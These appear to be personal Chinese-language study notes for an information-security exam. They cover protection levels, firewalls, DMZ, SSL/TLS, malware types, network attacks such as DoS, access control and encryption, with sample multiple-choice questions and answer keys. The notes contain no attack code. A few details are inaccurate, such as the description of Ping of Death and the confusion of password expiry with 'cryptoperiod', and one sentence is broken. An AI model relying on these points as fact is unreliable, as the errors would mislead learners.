#用于个人笔记整理
一、安全保护等级
1、GB 17859-1999
GB 17859-1999《计算机信息系统安全保护等级划分准则》是我国计算机信息系统安全保护等级划分的主要标准。它规定了计算机信息系统安全保护能力的五个等级,这些等级分别是:
1)用户自主保护级
定义:计算机信息系统安全保护等级的最低级别。
特点:用户需要自主采取措施来保护系统的安全,如通过访问控制、身份鉴别和数据完整性等机制,使用户具备自主安全保护的能力。
2)系统审计保护级
定义:在用户自主保护级的基础上,增加了审计功能。
特点:实施粒度更细的自主访问控制,通过登录规程、审计安全性相关事件和隔离资源,使用户对自己的行为负责。系统还能记录使用身份鉴别机制、客体引入用户地址空间等与安全相关的事件。
3)安全标记保护级
定义:在系统审计保护级的基础上,增加了安全标记和强制访问控制。
特点:对所有主体及其所控制的客体(如进程、文件、设备等)实施强制访问控制,为这些主体及客体指定敏感标记,以这些标记为依据进行强制访问控制。
4)结构化保护级
定义:在安全标记保护级的基础上,提出了更高级别的结构化要求。
特点:详细描述了安全策略模型、数据标记以及主体对客体强制访问控制的非形式化描述,并具有准确地标记输出信息的能力。
5)访问验证保护级
定义:计算机信息系统安全保护等级的最高级别。
特点:具体的安全保护要求和技术措施可能因标准的具体内容和版本而有所不同,但一般而言,这一级别将提供最高级别的安全防护,包括更严格的访问验证、更精细的安全策略管理和更全面的安全审计等。
二、安全防护体系
1、实体安全
关注物理设备和设施的安全,如服务器机房、数据中心、网络设备等的物理访问控制。
包括环境控制(如温度、湿度、防尘等)、物理安全(如门禁系统、监控摄像头等)和灾害恢复(如火灾预防、地震防护等)。
2、平台安全
涉及操作系统、中间件、数据库等底层平台的安全性。
包括安全补丁管理、访问控制、加密存储、日志审计等。
3、数据安全
确保数据的完整性、保密性和可用性。
包括数据加密、数据备份与恢复、数据脱敏、数据泄露防护(DLP)等。
还包括对敏感数据的访问控制、审计和监控。
4、通信安全
保护数据在传输过程中的安全性。
使用加密技术(如SSL/TLS)来保护通信链路。
包括VPN(虚拟私人网络)、网络隔离、入侵检测和防御系统(IDS/IPS)等。
5、应用安全
确保应用程序免受攻击和滥用。
包括输入验证、会话管理、访问控制、错误处理、安全配置等。
还包括应用程序级别的加密和审计功能。
6、运行安全
关注系统运行时的安全性。
包括安全监控、日志分析、事件响应、漏洞管理等。
通过安全信息和事件管理(SIEM)系统来收集、分析和响应安全事件。
7、管理安全
确保安全管理策略和流程的有效执行。
包括安全策略制定、安全意识培训、安全审计、合规性检查等。
管理安全还涉及人员权限管理、安全责任制和应急响应计划等。
三、数据安全策略
备份与恢复是一种数据安全策略。
1、存储设备
1)磁盘阵列:一种将多个磁盘驱动器组合成一个逻辑单元的数据存储设备,以提供数据冗余和性能提升。常见的磁盘阵列类型包括RAID(独立磁盘冗余阵列)。
2)磁带机 (磁带库):使用磁带作为存储介质的数据存储设备。磁带库通常包含多个磁带机和大量磁带,用于长期存储和备份。
3)光盘库:使用光盘(如CD、DVD或蓝光光盘)作为存储介质的数据存储设备。虽然不如磁盘或磁带常见,但在某些应用中仍有使用。
4)SAN设备:存储区域网络(Storage Area Network, SAN)是一种网络架构,允许独立的数据存储设备(如磁盘阵列)与服务器连接。SAN通常用于高性能和高可靠性的存储需求。
2、存储优化
1)DAS(直接附加存储):存储设备直接连接到服务器或工作站,没有网络层。DAS通常用于小型或不需要高可用性的存储需求。
2)NAS(网络附加存储):存储设备通过网络连接到服务器或工作站,通常使用以太网和文件系统(如NFS或SMB/CIFS)进行通信。NAS易于部署和管理,适用于文件共享和备份。
3)SAN(存储区域网络): SAN是一种允许存储设备与服务器连接的网络架构。SAN通常用于需要高性能和高可靠性的应用。
3、存储保护
1)磁盘阵列:通过RAID等技术提供数据冗余,以在磁盘故障时保护数据。
2)双机容错:通过两台或多台服务器之间的冗余和故障切换来保护应用和数据。
3)集群:将多台服务器组合成一个逻辑单元,以提供高可用性和负载均衡。
4)备份与恢复:定期将数据复制到另一个存储位置(如磁带、磁盘或云存储),以便在数据丢失或损坏时能够恢复。
4、存储管理
1)数据库备份与恢复:针对数据库应用的专用备份和恢复策略,确保数据库数据的完整性和可恢复性。
2)文件与卷管理:管理存储设备上的文件和卷,包括创建、删除、移动和修改操作。
复制:将数据从一个存储设备或位置复制到另一个,以实现数据冗余、备份或分发。
3)SAN管理:管理和配置SAN网络,包括添加、删除或修改存储设备、服务器和网络组件。
四、安全防护策略
安全防护策略是确保系统、网络和数据安全的关键措施。
1、安全日志
定义:安全日志用于记录非法用户的登录名称、操作时间、内容等信息,以便发现问题并提出解决措施。
特点:安全日志记录仅记录相关信息,不对非法行为做出主动反应,属于被动防护的策略。
作用:通过分析安全日志,系统管理员可以了解潜在的安全威胁,及时发现异常行为,并采取相应措施。
2、入侵检测
定义:入侵检测系统是一种主动的网格安全防护措施,从系统内部或各种网络资源中主动采集信息,分析可能的网络入侵或攻击。
特点:入侵检测系统通常应对入侵行为做出紧急响应,如自动执行切断服务、记录入侵过程、报警等动作。
作用:入侵检测系统能够实时地监测网络活动,发现潜在的攻击行为,并采取相应的防御措施,保护系统免受损害。
3、隔离防护
定义:隔离防护是将系统中的安全部分与非安全部分进行隔离的措施,主要技术手段有防火墙和隔离网闸等。
特点:防火墙主要用于内网和外网的逻辑隔离,而网闸主要用于实现内网和外网的物理隔离。
作用:隔离防护能够阻止未经授权的访问和攻击,保护系统免受外部威胁。同时,它还能够控制数据的流动,确保敏感数据不被泄露。
4、漏洞扫描
定义:漏洞扫描是指基于漏洞数据库,通过扫描等手段对指定的远程或本地计算机系统的安全脆弱性进行检测,发现可利用漏洞的一种安全检测行为。
特点:漏洞扫描器包括网络漏扫、主机漏扫、数据库漏扫等不同种类,它们可以定期或不定期地对系统进行扫描,发现潜在的安全隐患。
作用:漏洞扫描能够帮助系统管理员及时发现系统中的安全漏洞,从而采取相应的修复措施,提高系统的安全性。此外,漏洞扫描还可以为系统管理员提供关于系统安全状况的全面报告,帮助他们更好地了解系统的安全状况。
考点一: 四种基础的安全防护策略及特点
题目:能够主动采集信息,分析网络攻击行为和误操作的实时保护策略是指 (B)。
A 安全日志
B 入侵检测
C 隔离防护
D 防火墙
五、防火墙
1、概念
1)广义概念
广义的防火墙不仅包括了安装了防火墙软件的主机或路由器系统,还涵盖了整个网络的安全策略和安全行为。它是一种基于现代通信网络技术和信息安全技术的应用性安全技术,用于实现内部网络和外部网络之间的隔离与访问控制。广义的防火墙不仅仅是一个硬件或软件设备,更是一种安全策略的实施手段。它包括了网络安全策略的制定、执行、监控和改进等多个方面。防火墙作为网络安全的第一道门户,不仅要在技术上实现隔离与访问控制,还要在管理上确保安全策略的有效执行。
2)狭义定义
狭义的防火墙主要指的是安装了防火墙软件的主机或路由器系统。这些系统位于内部网络和网络(如Internet)之间的边界处,通过特定的软件或硬件设置来执行访问控制策略。防火墙对流经它的网络通信进行扫描,过滤掉潜在的攻击和恶意流量。它可以关闭不使用的端口,禁止特定端口的流出通信,从而封锁特洛伊木马等恶意软件。防火墙还能禁止来自特殊站点的访问,防止不明入侵者的通信。狭义的防火墙通常包括安全操作系统、过滤器、网关、域名服务和函件处理等部分,它们共同协作以确保网络通信的安全性。防火墙作为内部网络和外部网络之间的唯一出入口,根据预设的安全策略对出入网络的信息流进行允许、拒绝或监测。
2、DMZ区
DMZ区(隔离区,非军事化区,边界网络区)是非安全系统与安全系统之间的缓冲区,位于企业内部网络和外部网络之间的小网络区域内。通过DMZ区,可以有效地将需要对外提供服务的服务器(如Web服务器、FTP服务器等)与内部网络隔离,从而保护内部网络的安全。DMZ区是一个独立的网络区域,与内部网络和外部网络都保持一定的隔离。DMZ区内通常放置一些不含机密信息的公用服务器,如Web服务器、FTP服务器等,以便外部网络用户访问。DMZ区作为一道安全屏障,可以有效地阻挡来自外部网络的攻击,保护内部网络的安全。
DMZ区实现内外网分离,防止外部网络直接访问内部网络,提高内部网络的安全性。通过DMZ区可以控制外部网络对内部网络的访问流量,减少不必要的网络负担。DMZ区内的服务器即使受到攻击,也不会直接影响到内部网络,为内部网络提供了一道额外的安全防线。
3、包过滤
包过滤(Packet Filtering)是一种基于协议特定的标准,通过路由器或防火墙等设备对网络上流入流出的数据包进行监视和过滤的技术。该技术主要依赖于对数据包头部信息的检查,如TCP/UDP的源或目的端口号、协议类型(TCP、UDP、ICMP等)、源或目的IP地址等,并根据预设的规则来决定数据包是被允许通过还是被丢弃。
由于仅检查数据包头部信息,处理速度相对较快。标准的路由器通常都支持包过滤功能,无需额外购买昂贵的设备。对用户和应用透明,无需对用户进行培训,也不必在每台主机上安装特定的软件。随着网络应用的增多,制定完善的过滤规则变得复杂且耗时。大量的数据包处理可能会消耗较多的CPU资源,影响设备性能。安全控制能力限于网络层、传输层,无法彻底防止地址欺骗,涵盖应用协议不全,无法执行特殊的安全策略,且安全日志有限,应用层控制弱。包过滤技术适用于非集中化管理的机构、没有强大的集中安全策略的机构、网络主机数较少且主要依靠主机来防止入侵的场景。不建立链接状态表,前后报文无关。
4、状态检测
状态检测(Status Detection)是一种更为先进的网络安全技术,它直接对数据包的数据进行处理,并结合前后分组的数据进行综合判断,以决定是否允许该数据包通过。与包过滤技术不同,状态检测不仅检查数据包的头部信息,还考虑数据包之间的关联性和会话状态,从而提供更高的安全性。
通过考虑数据包之间的关联性和会话状态,能够更有效地识别并阻止潜在的攻击行为。
够支持多通道的应用层协议,如FTP、H.323等,以及动态端口的应用。能够对网络上流动的信息提供更全面的控制,包括应用层协议信息和传输层协议信息的检测。建立链接状态表,前后报文相关,应用层控制弱。相比包过滤技术,状态检测需要消耗更多的系统资源来进行数据包的分析和处理。为了实现有效的状态检测,需要配置复杂的会话状态表和临时访问控制表等。状态检测技术广泛应用于需要高安全性保障的网络环境中,如金融机构、政府机构、大型企业等。
5、代理服务技术
代理服务技术是指代理服务器运行在防火墙主机上的专门应用程序和服务器程序。这些程序接受用户对Internet服务的请求,并按照相应的安全策略将这些请求转发到实际的服务。代理服务器为一个特定的服务提供替代连接,充当服务的网关,因此又称为应用级网关。代理防火墙作为一个中间人,接收来自内部网络和外部网络的通信请求。它会代表内部网络发起对外的请求,同时也会代表外部网络向内部网络传输数据。代理防火墙会隐藏内部网络的真实IP地址,而用自己的地址向外部网络通信,从而防止攻击者直接访问内部网络。
代理防火墙会隐藏内部网络的真实IP地址,提高网络的安全性。代理防火墙会对通过它的网络流量进行筛选和过滤,根据预设的规则阻止或丢弃不符合要求的流量。能够分析和监控网络流量的应用层数据,包括HTTP、FTP等协议,识别和阻止传输恶意代码、违规数据或不安全的文件。实施认证和访问控制机制,要求用户登录并验证身份才能访问特定的资源,限制外部用户对敏感信息的访问权限。记录网络流量的日志信息,包括源IP、目标IP、通信时间等,用于后续的安全事件调查和审计。
考法一:防火墙的特性
题目:以下关于防火墙功能特性的说法中,错误的是 (D)
A 控制进出网络的数据包和数据流向
B 提供流量信息的日志和审计
C 隐藏内部IP以及网络结构细节
D 提供漏洞扫描功能
解析:
A. 控制进出网络的数据包和数据流向:这是防火墙的基本功能之一。防火墙通过配置规则来允许或拒绝特定类型的数据包通过,从而控制进出网络的数据流。
B. 提供流量信息的日志和审计:防火墙通常具备记录网络流量信息的功能,包括通过防火墙的数据包、连接尝试等信息。这些日志可以用于审计和故障排查。
C. 隐藏内部IP以及网络结构细节:防火墙可以通过网络地址转换(NAT)等技术来隐藏内部网络的IP地址和细节,从而增加网络的安全性。
D. 提供漏洞扫描功能:虽然某些防火墙产品可能集成了漏洞扫描的组件或与之配合使用的工具,但漏洞扫描并不是防火墙的核心功能。防火墙的主要功能是控制网络访问和提供安全策略的执行,而漏洞扫描则是一种独立的安全评估技术,用于发现和报告系统、应用程序或网络中的安全弱点。因此,将漏洞扫描功能作为防火墙的必需或主要特性是不准确的。
考点二:防火墙可进行过滤的对象
题目:防火墙对数据包进行过滤时,不能过滤的是 (B)
A 源和目的IP地址
B 存在安全威胁的URL地址
C IP协议号
D 源和目的端口
解析:
A 源和目的IP地址:防火墙可以检查数据包的IP头部,包括源IP地址和目的IP地址。这是防火墙进行过滤的基本依据之一,用于判断数据包是否来自可信的源或是否应该被发送到特定的目的地。因此,防火墙能够过滤源和目的IP地址。
B 存在安全威胁的URL地址:URL(统一资源定位符)是应用层的数据内容,用于标识和定位互联网上的资源。防火墙主要工作在网络层和传输层,它直接处理的是IP数据包和TCP/UDP数据包,而不直接处理应用层的数据内容。因此,防火墙不能直接过滤存在安全威胁的URL地址。这类过滤通常需要在应用层进行,例如通过代理服务器或专门的URL过滤软件来实现。
C IP协议号:IP协议号是IP头部中的一个字段,用于标识传输层所使用的协议(如TCP、UDP等)。防火墙可以检查这个字段,以确定数据包是否使用了特定的协议,并据此进行过滤。因此,防火墙能够过滤IP协议号。
D 源和目的端口:防火墙还可以检查TCP/UDP数据包的源端口和目的端口。这些端口信息对于判断数据包是否应该被允许通过非常重要,因为不同的端口通常与不同的应用服务相关联。因此,防火墙能够过滤源和目的端口。
考点三:DMZ区
网络系统中,通常把(B) 置于DMZ区
A 网络管理服务器
B Web服务器
C 入侵检测服务器
D 财务管理服务器
解析:
A. 网络管理服务器:网络管理服务器通常用于管理整个网络系统的配置、监控和故障排查等任务。由于它包含大量关于内部网络结构和配置的信息,因此不适合放置在DMZ区,以免泄露敏感信息或成为攻击目标。
B. Web服务器:Web服务器是提供网页服务的服务器,它需要对外提供访问接口,以便用户能够通过互联网访问网站。由于Web服务器需要同时与内部网络(如数据库服务器)和外部网络(如互联网用户)进行通信,因此将其放置在DMZ区是一个合理的选择。这样可以在保护内部网络安全的同时,为外部用户提供服务。
C. 入侵检测服务器:入侵检测服务器用于监控和分析网络流量,以检测潜在的恶意活动。它通常部署在内部网络,以便对进出内部网络的数据进行全面监控。将入侵检测服务器放置在DMZ区可能会限制其对内部网络的监控能力,因此不是最佳选择。
D. 财务管理服务器:财务管理服务器包含企业的财务数据和敏感信息,其安全性要求极高。将其放置在DMZ区可能会增加数据泄露的风险,因为DMZ区的设计初衷是为了放置那些需要对外提供服务的服务器,而不是存储敏感数据的服务器。
六、安全协议
1、SSL
SSL(Secure Socket Layer)最初是由Netscape开发的一种安全协议,用于在两个通信应用程序之间提供保密性和数据完整性。SSL在Web浏览器和服务器之间建立了一个加密的通道,以确保数据在传输过程中不会被窃听或篡改。然而,随着技术的发展和安全性的需求增加,SSL已经逐渐被TLS所取代。
2、TLS
TLS(Transport Layer Security)是SSL的继任者,它提供了更高的安全性和更广泛的协议支持。TLS也是工作在传输层,但它解决了SSL的一些已知问题,并提供了更多的功能和改进的安全特性。今天,几乎所有的现代Web应用都使用TLS来加密其通信。
3、HTTPS
HTTPS(Hypertext Transfer Protocol Secure)是HTTP(Hypertext Transfer Protocol,超文本传输协议)的安全版本,它通过在HTTP协议下加入SSL/TLS层来实现加密的Web通信。HTTPS通过在客户端(通常是Web浏览器)和服务器之间建立一个加密的通道来保护数据的传输安全。这个加密的通道确保了数据的保密性、完整性和认证性。
考法一:各种安全协议之间的关系
题目:下列安全协议中,与TLS最接近的协议是 (B)
A PGP
B SSL
C HTTPS
D IPSec
解析:
A. PGP(Pretty Good Privacy):PGP是一种用于加密和签名电子邮件的安全协议。它主要关注于数据的加密和身份验证,通过对称加密、非对称加密、数字签名等技术来保护数据的机密性和完整性。然而,PGP并不直接提供传输层的安全保障,而是侧重于应用层的数据加密和签名。因此,PGP与TLS在功能和层次上有所不同。
B. SSL(Secure Sockets Layer,安全套接层):SSL最初由Netscape开发,用于在客户端和服务器之间建立加密的通信。它是TLS的前身,是在SSL 3.0的基础上发展而来的。尽管SSL已经被TLS所取代,但由于历史原因,人们仍然经常使用“SSL”一词来指代TLS。从技术和历史的角度来看,SSL与TLS在功能和实现上非常接近,TLS可以看作是SSL的升级版。
C. HTTPS(Hypertext Transfer Protocol Secure):HTTPS是HTTP协议的安全版本,它通过在HTTP协议下加入SSL/TLS层来实现加密的Web通信。虽然HTTPS依赖于SSL/TLS来提供安全性,但它本身是一个应用层协议,与TLS在协议层次上有所不同。HTTPS更多地被看作是一个安全的应用层协议,而不是一个与TLS直接竞争的传输层安全协议。
D. IPSec(Internet Protocol Security)IPSec是IETF制定的三层隧道加密协议,它在IP层对IP报文提供安全服务。IPSec与TLS在协议层次和功能上有所不同,IPSec更侧重于网络层:的安全保障,而TLS则专注于传输层的安全。
七、病毒与木马
1、病毒
病毒是一种能够自我复制并感染其他程序的恶意软件。它的主要目的是破坏计算机系统、数据或干扰计算机的正常运行。病毒通常通过复制自身并附加到合法程序上来进行传播,当这些被感染的程序被执行时,病毒就会被激活并开始执行其恶意代码。
病毒的特点包括:
自我复制:病毒能够自我复制并感染其他程序。
潜伏性:病毒在感染系统后可能不会立即发作,而是潜伏在系统中等待特定条件触发。
破坏性:病毒能够破坏计算机系统、数据或干扰计算机的正常运行。
2、木马
木马,是一种伪装成合法软件的恶意程序。与病毒不同,木马通常不会自我复制,而是伪装成有用的软件或程序,诱骗用户下载并执行。一旦木马被安装在计算机上,攻击者就可以远程控制受感染的计算机,执行各种恶意操作,如窃取数据、破坏系统或作为攻击其他计算机系统的跳板。
木马的特点包括:
伪装性:木马通常伪装成合法的软件或程序,以诱骗用户下载并执行。
远程控制:一旦木马被安装在计算机上,攻击者就可以远程控制受感染的计算机。
隐蔽性:木马通常会隐藏自己的存在,以避免被用户或安全软件发现。
3、常见病毒和木马
系统病毒 前缀: Win32、PE、W32,如: KCOM-Win32.KCOM
蠕虫病毒 如: 恶鹰-Worm.BBeagle
木马病毒、黑客病毒 如: QQ消息尾巴木马-Trojan.QQ3344
脚本病毒 如: 红色代码--Script.Redlof
宏病毒 如:美丽莎-Macro.Melissa
后门病毒 如: 灰鸽子-Backdoor.Win32.Huigezi
病毒种植程序病毒 冰河播种者-Dropper,BingHe2.2C
破坏性程序病毒 杀手命令-Harm.Command.Killer
玩笑病毒 如: 女鬼-Joke.Girl ghost
捆绑机病毒 如: 捆绑QQ-Binder.QQPass.QQBin
木马 如:冰河
八、网络攻击
1、冒充
冒充攻击(Impersonation)是指一个实体假装成另一个实体进行攻击。这通常涉及伪造身份以获取敏感信息或访问权限。
口令猜测:通过猜测用户的口令来获得用户的访问权限。大多数系统对用户的鉴别就是基于用户的用户名和口令认证。
2、缓冲区溢出
缓冲区溢出(Buffer Overflow)是一种非常普遍且危险的漏洞,它利用程序设计中的缺陷,向程序的缓冲区写入超出其容量的数据,从而破坏程序运行或获取系统控制权,可以导致程序运行失败、系统宕机、重新启动,甚至执行非授权指令,取得系统特权。
3、重演
重放攻击(Replay Attack)是指攻击者通过重发或延迟有效的数据来在已建立好的连接中获得未认证的接入。利用网络中传输的数据包可以被捕获并重新发送的特点,绕过身份验证机制。
4、消息篡改
消息篡改(Message Tampering)是指一个合法消息的某些部分被改变、删除,消息被延迟或改变顺序,以产生一个未授权的效果。
相关术语:
数据篡改:恶意篡改数据库中和数据交换时的数据。
5、DNS高速缓存污染
DNS高速缓存污染(DNS Cache Pollution)是指一些刻意制造或无意中制造出来的域名服务器数据包,把域名指往不正确的IP地址。导致网络中的计算机被导引往错误的服务器或网址。
6、伪造电子邮件
伪造电子邮件(Fake Email)是指捕获电子邮件后,将电子邮件中的内容篡改后再转送出去,以达到欺骗接收者的目的。
7、服务拒绝
服务拒绝攻击(Denial of Service, DoS)是攻击者让目标机器停止提供服务,是黑客常用的攻击手段之一。
常见类型:
死亡Ping:通过发送大量的ICMP Echo请求(Ping)数据包,导致目标系统资源耗尽。
泪滴攻击:利用TCP/IP堆栈的缺陷,发送重叠偏移的伪造IP分段,导致系统崩溃。
UDP洪水:通过发送大量的UDP数据包来淹没目标系统,耗尽其资源。
SYN洪水(SYN Flood):利用TCP协议的缺陷,发送大量伪造的TCP连接请求,使服务器资源耗尽。
Land攻击:发送一个原地址和目标地址都相同的SYN包,导致服务器向自身发送SYN-ACK消息,消耗资源。
Smurf攻击:通过发送将回复地址设置成受害网络的广播地址的ICMP应答请求(ping)数据包,导致网络阻塞。
Fraggle攻击:Smurf攻击的变种,使用UDP协议而非ICMP协议。
电子邮件炸弹:向同一电子邮箱发送大量垃圾邮件,导致邮箱系统崩溃或无法正常使用。
畸形消息攻击:发送格式或内容不符合协议标准的消息,导致目标系统解析错误或崩溃。
8、分布式拒绝服务攻击
工作原理:攻击者首先通过各种手段(如恶意软件、漏洞利用等)感染并控制大量的计算机,这些被控制的计算机被称为“僵尸机器”。这些机器分布在互联网的各个角落,可以跨越多个地理位置和网络。攻击者通过中央控制服务器向这些僵尸机器发送指令,让它们同时或几乎同时向目标服务器发送大量的请求。这些请求可以是正常的服务请求(如HTTP请求、DNS查询等),但数量远远超出了目标服务器能够处理的能力。由于大量的请求涌入,目标服务器的资源(如CPU、内存、带宽等)很快就会被耗尽。这会导致服务器无法响应正常的服务请求,甚至可能导致服务器崩溃或重启。最终的结果是目标服务器的服务被中断,无法正常为用户提供服务。这可能会给目标组织带来巨大的经济损失和声誉损害。
考点一:攻击类型
题目:(A) 不属于主动攻击。
A 流量分析
B 重放
C IP地址欺骗
D 拒绝
解析:
A. 流量分析:这是一种被动攻击方式。攻击者通过监听网络流量,分析其中的模式,以推断出传输的信息内容或用户的行为习惯,但并不直接修改或干扰数据。
B. 重放:这是一种主动攻击方式。攻击者捕获一个合法的数据包,并在稍后的时间重放这个数据包,以欺骗接收者认为这是一个新的、合法的请求。这直接修改了数据的完整性和有效性。
C. IP地址欺骗:这同样是一种主动攻击方式。攻击者通过伪造IP地址来伪装成另一个可信的源,从而发送恶意的数据包或进行其他形式的网络攻击。这直接破坏了数据的来源认证,属于主动干扰数据传输的行为。
D. 拒绝服务(DoS) 或 分布式拒绝服务(DDoS):这也是一种主动攻击方式。攻击者通过发送大量的无用请求到目标服务器,导致服务器资源耗尽,无法为正常用户提供服务。这直接干扰了正常的网络服务,属于主动攻击范畴。服务
考点二:DOS/DDOS攻击
题目:以下叙述中,不正确的是 (C)
A 拒绝服务攻击的目的是使计算机或者网络无法提供正常的服务
B 拒绝服务攻击是不断向计算机发起请求来实现的
C 拒绝服务攻击会造成用户密码的泄漏
D DDOS是一种拒绝服务攻击形式
解析:
A. 正确。拒绝服务攻击(Denial of Service, DoS)的主要目的就是使目标计算机或网络因为资源耗尽而无法提供正常的服务,比如无法访问网站、邮件服务器无法接收邮件等。
B. 正确。拒绝服务攻击的一种常见方式就是不断向目标计算机发起请求,消耗其计算资源、网络资源或存储资源,导致目标计算机无法响应正常的服务请求。
C. 不正确。拒绝服务攻击的目标是使服务不可用,而不是为了窃取或泄漏用户密码。用户密码的泄漏通常与密码破解、钓鱼攻击、恶意软件等攻击手段相关。
D. 正确。分布式拒绝服务攻击(Distributed Denial of Service, DDoS)是拒绝服务攻击的一种形式,它利用多个攻击源同时向目标发起攻击,以达到使目标资源耗尽、服务中断的目的。DDoS攻击因其难以防御和追踪,成为了网络安全领域的一个重要威胁。
九、访问控制
1、访问控制实现方式
1)限制访问系统的人员
用户标识与验证,三种常用的方法:要求用户输入一些保密信息、采用物理识别设备、采用生物统计学系统
2)限制进入系统的用户所能做的操作
存取控制、隔离技术法、限制权限法
2、身份验证方式
1)用户名/密码方式
这是最传统、最基础的身份验证方式。用户通过输入用户名和密码来验证身份。
优点:简单易用,成本低廉,广泛支持。
缺点:安全性较低,容易受到密码猜测、钓鱼攻击、密码泄露等威胁。
2)IC卡认证
IC卡(集成电路卡)存储了用户的身份信息和认证密钥,用户通过读卡器输入IC卡信息进行身份验证。
优点:具有较高的安全性,因为IC卡不易复制,且通常包含加密功能。
缺点:需要额外的硬件设备(如IC卡和读卡器),成本较高,且容易丢失或损坏。同是是静态密码,刷卡后可能会存储在高速缓冲中被盗取。
3)动态密码
动态密码是一种随时间或其他因素变化的密码。用户通过特定的硬件或软件(如手机APP、短信服务、硬件令牌等)获取当前的密码进行身份验证。
优点:提高了安全性,因为密码是动态变化的,不易被猜测或复制。
缺点:需要用户随身携带或安装额外的设备或软件,且在某些情况下(如设备故障或信号不佳)可能影响使用。
4)USB Key认证
USB Key是一种小型的USB设备,内置了用户的身份信息和加密密钥。用户通过插入USB Key到计算机中,并利用其内置的密码或生物识别技术进行身份验证。
优点:安全性高,因为USB Key难以复制,且内置了加密功能。同时,它还可以作为存储介质,方便用户携带和使用。
缺点:同样需要额外的硬件设备,成本较高,且容易丢失或损坏。此外,USB接口可能受到病毒或恶意软件的攻击。
3、用户口令保护策略
1)安全密码
安全密码是保护用户账户免受未经授权访问的第一道防线。一个安全密码应满足以下要求:
密码长度:密码长度是影响密码安全性的关键因素之一。通常,一个安全的密码应至少包含8个字符,但更长的密码会更安全。推荐使用12个或更多字符的密码来增加破解密码的难度。
密码复杂度:密码应包含大写字母、小写字母、数字和特殊符号的组合,以增加破解难度。避免使用容易猜测或具有明显规律的密码,如生日、电话号码或连续的数字/字母序列。
不带联想色彩:避免使用与个人信息、兴趣爱好或容易联想到的事物相关的密码,以减少被猜测的风险。
不用完整的单词:不要使用完整的单词或短语作为密码,因为它们更容易被字典攻击破解。
2)密码有效期
密码有效期(cryptoperiod):是某一特定密钥被授权可用的一段时间,或给定系统密钥保持有效的一段时间。一旦密码有效期到期,密钥将对加密和解密都不起作用。设置密码有效期可以强制用户定期更换密码,减少密码被长期盗用的风险。建议根据组织的安全策略和业务需求来设定密码的有效期,通常为30天到180天不等。
最大口令时效与最小口令时效:这两个概念通常用于指导密码更换的频率。最大口令时效是指用户密码在达到这个时间段后必须更换,而最小口令时效则是指用户必须等待这个时间段后才能再次更改密码。这两个设置有助于平衡密码的安全性和用户的便利性。
3)口令保护策略
口令历史:系统应记录用户最近使用过的密码,并禁止用户重复使用这些密码。这可以防止用户简单地循环使用旧密码,从而增加账户的安全性。
加密选项:在存储和传输用户口令时,应采用强加密算法进行加密。例如,在服务器端使用SHA-512加盐散列算法来存储密码的散列值,同时在传输过程中使用HTTPS等加密通道来保护口令的机密性。
口令锁定:当用户连续多次输入错误口令时,系统应自动锁定该账户,以防止自动化工具进行暴力破解。锁定时间可以根据实际情况进行设定,通常为几分钟到几小时不等。
4)其他安全措施
双因素认证:除了密码之外,还可以要求用户提供额外的身份验证因素,如手机验证码、指纹识别或硬件令牌等。这可以进一步增加账户的安全性。
安全审计和监控:定期审计和监控用户账户的活动情况,及时发现并处理异常行为。
用户教育和培训:加强对用户的安全教育和培训,提高用户的安全意识和自我保护能力。
十、加密技术
1、对称性加密技术
对称性加密技术,也称为对称密钥加密,是一种使用单一密钥对数据进行加密和解密的加密方式。这种加密方式的特点是加密和解密过程使用相同的密钥,因此具有高效、快速的特点,非常适合于对大数据进行加密处理。
1)对称密钥技术特点
算法效率高:对称加密算法的执行速度快,能够高效地处理大量数据。这是因为它避免了公钥加密中复杂的数学运算,如大数分解或离散对数等,从而显著提高了处理速度。
速度快:由于算法的高效性,对称加密能够在短时间内完成大量数据的加密和解密工作,这对于需要实时处理大量数据的应用场景尤为重要。
适合于对大数据进行加密:鉴于其高效和快速的特点,对称加密是处理大数据加密的理想选择。它能够在不牺牲太多性能的情况下,保护大量数据的机密性和完整性。
密钥分发困难:然而,对称加密也面临一个显著的挑战,即密钥的分发和管理。由于加密和解密使用的是相同的密钥,因此如何安全地将密钥分发给所有需要加密或解密数据的用户或系统,成为了一个重要的安全问题。如果密钥在分发过程中被截获,那么加密的数据就可能面临泄露的风险。
2)常见对称加密算法
在对称加密领域,存在多种常见的加密算法,包括但不限于:
DES(Data Encryption Standard):这是一种早期的对称加密算法,使用56位密钥。尽管由于其较短的密钥长度而不再被认为是安全的,但它仍然是学习对称加密原理的一个经典例子。
3DES(Triple DES):作为DES的增强版,3DES使用三个56位的密钥进行三次DES加密,从而提供了更高的安全性。然而,随着计算能力的提升,3DES也逐渐被认为不再足够安全。
AES(Advanced Encryption Standard):目前广泛使用的对称加密算法之一,由NIST(美国国家标准与技术研究院)选定为联邦信息处理标准。AES支持多种密钥长度(如128位、192位和256位),提供了更高的安全性和灵活性。
RC-5:一种可配置的、参数化的分组密码,其安全性取决于所使用的密钥长度和轮数。
IDEA(International Data Encryption Algorithm):另一种流行的对称加密算法,以其较高的安全性和效率而著称。然而,随着AES的普及,IDEA的使用逐渐减少。
2、非对称加密技术
非对称加密技术,也被称为公钥加密这些特点共同构成了其安全性和适用性的基础
1)密钥特点
密钥成对出现:
非对称加密技术中,每个用户或系统都拥有一对密钥:公钥(Public Key)和私钥(Private Key)。公钥用于加密数据或验证签名,而私钥用于解密数据或生成签名。这两把密钥在数学上是相互关联的,但又是独立且不同的。
密钥之间不能相互推导:
公钥和私钥之间存在一种特殊的数学关系,但这种关系并不能用来从公钥推导出私钥,或者从私钥推导出公钥。这种单向性保证了加密系统的安全性。
公钥对外公开:
公钥是可以安全地分享给任何需要与之通信的实体的。任何拥有公钥的人都可以使用该公钥对数据进行加密,或者验证由私钥生成的数字签名。
私钥只有持有者持有:
私钥是保密的,必须严格控制在持有者手中。私钥的泄露将导致加密系统的安全性受到严重威胁,因为任何人持有私钥都可以解密用该公钥加密的数据,或者伪造由该私钥生成的签名。
2)算法特点
算法效率相对较低:
与对称加密算法相比,非对称加密算法的加密和解密过程通常更加复杂和耗时。这主要是因为非对称加密算法基于的数学问题(如大数分解、离散对数或椭圆曲线数学)更加难以解决。因此,在实际应用中,非对称加密往往用于加密少量关键数据(如对称加密的密钥)或进行身份验证等场景。
3)常见加密算法
RSA:
RSA是最广为人知和广泛使用的非对称加密算法之一。它基于大数分解的困难性来构建加密系统。RSA算法的安全性取决于密钥的长度,通常推荐使用至少2048位的密钥长度来确保安全。
ECC(椭圆曲线加密算法):
ECC是一种基于椭圆曲线数学问题的非对称加密算法。与RSA相比,ECC能够在提供相同或更高安全性的同时,使用更短的密钥长度。这使得ECC在资源受限的环境中(如移动设备、物联网设备等)更加受欢迎。ECC算法在比特币等加密货币中也被广泛应用。
